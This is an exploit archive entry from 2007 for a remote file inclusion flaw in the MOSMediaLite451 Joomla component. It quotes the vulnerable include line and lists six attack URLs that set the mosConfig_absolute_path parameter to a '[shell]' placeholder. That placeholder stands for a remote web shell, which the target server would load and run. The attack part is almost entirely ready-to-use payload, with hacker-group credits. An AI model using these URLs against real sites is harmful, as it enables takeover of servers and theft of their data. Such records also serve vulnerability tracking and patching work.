|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
If you have found a vulnerability, please send to our SecurityAlert Database : secalert()securityreason()com
Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com |
|
|
Home ExploitAlert Database |
|
|
Topic : | Joomla component MOSMediaLite451 Remote File Inclusion Vulnerability
|
ExploitAlert : 2860
Credit : k1n9k0ng
Date : 08.10.2007
Download
Plain text version
 Exploit Code : +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++
Scripts : MOSMediaLite451
Discovered By : k1n9k0ng
Scripts site :
http://www.djoomla.com/component/option,com_remository/Itemid,2/func,filein
fo/id,104/
Thanks To : #sekuritionline, #semprol, #bajingan, #mimid, #r.i.p,
#x-code, #yogyafree
special To : adhietslank, babypunk, cyberlog, cah_gemblunkz, the_sims,
ARiee, letjen, k1tk4t
site : www.sekuritionline.net
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++++++
bug Script:
include_once( $mosConfig_absolute_path .
"/administrator/components/com_mosmedia/mosmedia.config.php" );
bug found:
"http://www.site.net/administrator/components/com_mosmedia/includes/credits
.html.php?mosConfig_absolute_path=[shell] "
"http://www.site.net/administrator/components/com_mosmedia/includes/info.ht
ml.php?mosConfig_absolute_path=[shell] "
"http://www.site.net/administrator/components/com_mosmedia/includes/media.d
ivs.php?mosConfig_absolute_path=[shell] "
"http://www.site.net/administrator/components/com_mosmedia/includes/media.d
ivs.js.php?mosConfig_absolute_path=[shell] "
"http://www.site.net/administrator/components/com_mosmedia/includes/purchas
e.html.php?mosConfig_absolute_path=[shell] "
"http://www.site.net/administrator/components/com_mosmedia/includes/support
.html.php?mosConfig_absolute_path=[shell] "
Feedback :
If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com.
|
|
|
|